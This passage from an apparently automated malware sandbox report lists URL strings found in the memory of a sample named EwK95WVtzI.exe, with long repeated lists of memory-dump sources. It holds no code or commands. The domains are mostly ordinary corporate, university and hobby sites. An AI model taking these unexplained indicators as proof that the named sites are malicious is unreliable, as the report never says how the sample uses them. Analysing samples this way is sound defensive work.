00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?gif
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?today
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?yes
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/gallery.htm
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright%20fortune.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.basmedcol.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.bucea.edu.cn/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com//e
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/O
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ccri.com.cn/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chd.com.cn/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/index.shtml
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/xhtml/images/logo.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/m
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/.0
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/D
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/X
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/e
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/vd:
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.crrcgc.cc/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/.0
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/%9
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/)9
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/)o
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/Lo
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/#
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/&
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/&
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/Y
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/O
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/aw
